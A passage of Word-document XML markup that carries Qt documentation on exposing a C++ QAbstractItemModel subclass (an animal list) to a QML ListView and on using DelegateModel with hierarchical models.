          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> roles</w:t>
      </w:r>
      <w:r w:rsidRPr="008D4C56">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088385D" w:rsidRPr="008D4C56" w:rsidRDefault="0088385D" w:rsidP="0088385D">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D4C56">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> argc</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char</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argv</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QGuiApplication</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> app</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argc</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argv</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AnimalModel</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> model</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addAnimal</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Animal</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"Wolf"</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"Medium"</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addAnimal</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Animal</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"Polar bear"</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"Large"</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addAnimal</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Animal</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"Quoll"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"Small"</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QQuickView</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> view</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view</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setResizeMode</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QQuickView</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SizeRootObjectToView</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QQmlContext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ctxt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view</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rootContext</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ctxt</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>setContextProperty</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"myModel"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&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>model</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Fonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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This model is displayed by a</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2629" w:history="1">
        <w:r w:rsidRPr="0088385D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>delegate that accesses the</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>size</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>roles:</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ListView</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width</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200</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height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250</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myModel</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delegate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Text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text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"Animal: "</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type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 "</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size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Fonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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AC1824">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML views are automatically updated when the model changes</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Remember the </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC1824">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>model must follow the standard rules for model changes and notify the view when the model has changed by using</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC1824">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2630" w:anchor="dataChanged" w:history="1">
        <w:r w:rsidRPr="00AC1824">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QAbstractItemModel::dataChanged</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AC1824">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(),</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC1824">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2631" w:anchor="beginInsertRows" w:history="1">
        <w:r w:rsidRPr="00AC1824">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QAbstractItemModel::beginInsertRows</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AC1824">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(), and so on</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. See the</w:t>
      </w:r>
      <w:r w:rsidR="00AC1824">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2632" w:anchor="model-subclassing-reference" w:history="1">
        <w:r w:rsidRPr="00AC1824">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="FF0000"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Model subclassing reference</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AC1824" w:rsidRPr="00AC1824">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:hyperlink r:id="rId2633" w:anchor="model-subclassing-reference" w:history="1">
        <w:r w:rsidR="00AC1824" w:rsidRPr="00AC1824">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="FF0000"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/model-view-programming.html#model-subclassing-reference</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AC1824">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
      <w:r w:rsidR="00AC1824">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for more information.</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The complete source code for this example is available in</w:t>
      </w:r>
      <w:r w:rsidR="00AC1824">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2634" w:history="1">
        <w:r w:rsidRPr="0088385D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>examples/quick/models/abstractitemmodel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AC1824">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>within the Qt install directory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088385D" w:rsidRPr="0088385D" w:rsidRDefault="00490E7E" w:rsidP="0088385D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2635" w:history="1">
        <w:r w:rsidR="0088385D" w:rsidRPr="00AC1824">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QAbstractItemModel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AC1824" w:rsidRPr="00AC1824">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0088385D" w:rsidRPr="00AC1824">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>presents a hierarchy of tables, but the views currently provided by QML can only display list data</w:t>
      </w:r>
      <w:r w:rsidR="0088385D" w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. In order to display the child lists of a hierarchical model, use the</w:t>
      </w:r>
      <w:r w:rsidR="004E21D3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2636" w:history="1">
        <w:r w:rsidR="0088385D" w:rsidRPr="004E21D3">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="FF0000"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>DelegateModel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="004E21D3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0088385D" w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">QML type, which provides the </w:t>
      </w:r>
      <w:r w:rsidR="0088385D" w:rsidRPr="004E21D3">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>following properties</w:t>
      </w:r>
      <w:r w:rsidR="0088385D" w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and functions to be used with list models of</w:t>
      </w:r>
      <w:r w:rsidR="004E21D3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2637" w:history="1">
        <w:r w:rsidR="0088385D" w:rsidRPr="0088385D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QAbstractItemModel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="004E21D3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0088385D" w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088385D" w:rsidRPr="0088385D" w:rsidRDefault="0088385D" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hasModelChildren</w:t>
      </w:r>
      <w:r w:rsidR="004E21D3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>role property to determine whether a node has child nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088385D" w:rsidRPr="0088385D" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2638" w:anchor="rootIndex-prop" w:history="1">
        <w:r w:rsidR="0088385D" w:rsidRPr="0088385D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>DelegateModel::rootIndex</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="004E21D3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0088385D" w:rsidRPr="0088385D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>allows the root node to be specified</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088385D" w:rsidRPr="0088385D" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2639" w:anchor="modelIndex-method" w:history="1">
        <w:r w:rsidR="0088385D" w:rsidRPr="0088385D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>DelegateModel::modelIndex</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0088385D" w:rsidRPr="0088385D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() returns a</w:t>
      </w:r>
      <w:r w:rsidR="004E21D3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2640" w:history="1">
        <w:r w:rsidR="0088385D" w:rsidRPr="0088385D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QModelIndex</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="004E21D3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0088385D" w:rsidRPr="0088385D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>which can be assigned to</w:t>
      </w:r>
      <w:r w:rsidR="004E21D3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2641" w:anchor="rootIndex-prop" w:history="1">
        <w:r w:rsidR="0088385D" w:rsidRPr="0088385D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>DelegateModel::rootIndex</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0088385D" w:rsidRPr="004E21D3" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
